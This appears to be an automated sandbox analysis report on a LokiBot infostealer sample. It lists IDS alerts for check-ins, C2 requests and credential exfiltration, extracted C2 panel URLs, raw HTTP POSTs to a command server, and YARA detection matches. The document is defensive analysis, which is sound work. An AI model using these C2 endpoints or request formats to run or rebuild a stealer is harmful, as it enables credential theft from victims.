              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49751 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49751 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49763 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49763 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49763 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49757 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49757 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49749 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49763 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49763 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49751 -> 172.67.134.88:80
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Malware configuration extractorURLs: touxzw.ir/sirr/five/fre.php
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: global trafficHTTP traffic detected: POST /sirr/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66673698Content-Length: 180Connection: close
              Source: global trafficHTTP traffic detected: POST /sirr/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66673698Content-Length: 180Connection: close
              Source: global trafficHTTP traffic detected: POST /sirr/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66673698Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /sirr/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66673698Content-Length: 153Connection: close
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00404ED4 recv,8_2_00404ED4
              Source: global trafficDNS traffic detected: DNS query: touxzw.ir
              Source: unknownHTTP traffic detected: POST /sirr/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66673698Content-Length: 180Connection: close
              Source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
              Source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
              Source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: LEmJJ87mUQ.exe, 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, aWBoUwiux.exe, 00000009.00000002.2502975409.0000000002954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
              Source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, aWBoUwiux.exe, 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, aWBoUwiux.exe, 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

              System Summary

              barindex
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: LEmJJ87mUQ.exe PID: 5016, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: Process Memory Space: RegSvcs.exe PID: 2568, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: Process Memory Space: aWBoUwiux.exe PID: 5572, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 0_2_0187E2740_2_0187E274
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 0_2_056A2D180_2_056A2D18
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 0_2_056A27680_2_056A2768
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 0_2_056A27570_2_056A2757
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 0_2_07B09B000_2_07B09B00
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 0_2_07B014D80_2_07B014D8
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 0_2_07B031100_2_07B03110
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 0_2_07B031000_2_07B03100
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 0_2_07B010A00_2_07B010A0
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 0_2_07B02CD80_2_07B02CD8
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 0_2_07B02CC80_2_07B02CC8
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 0_2_07B00C680_2_07B00C68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040549C8_2_0040549C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004029D48_2_004029D4
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeCode function: 9_2_028DE2749_2_028DE274
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeCode function: 9_2_06F314D89_2_06F314D8
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeCode function: 9_2_06F32CD89_2_06F32CD8
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeCode function: 9_2_06F32CC89_2_06F32CC8
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeCode function: 9_2_06F30C689_2_06F30C68
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeCode function: 9_2_06F310A09_2_06F310A0
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeCode function: 9_2_06F331109_2_06F33110
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeCode function: 9_2_06F331009_2_06F33100
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00405B6F appears 42 times
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 1788
              Source: LEmJJ87mUQ.exeStatic PE information: invalid certificate
              Source: LEmJJ87mUQ.exe, 00000000.00000002.2352129099.0000000007E92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs LEmJJ87mUQ.exe
              Source: LEmJJ87mUQ.exe, 00000000.00000002.2352129099.0000000007E92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs LEmJJ87mUQ.exe
              Source: LEmJJ87mUQ.exe, 00000000.00000002.2351790271.0000000007BBB000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs LEmJJ87mUQ.exe
              Source: LEmJJ87mUQ.exe, 00000000.00000002.2347808139.000000000427D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs LEmJJ87mUQ.exe
              Source: LEmJJ87mUQ.exe, 00000000.00000000.2255595949.0000000000D42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezdr.exe: vs LEmJJ87mUQ.exe
              Source: LEmJJ87mUQ.exe, 00000000.00000002.2346236371.000000000142E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs LEmJJ87mUQ.exe
              Source: LEmJJ87mUQ.exeBinary or memory string: OriginalFilenamezdr.exe: vs LEmJJ87mUQ.exe
              Source: LEmJJ87mUQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
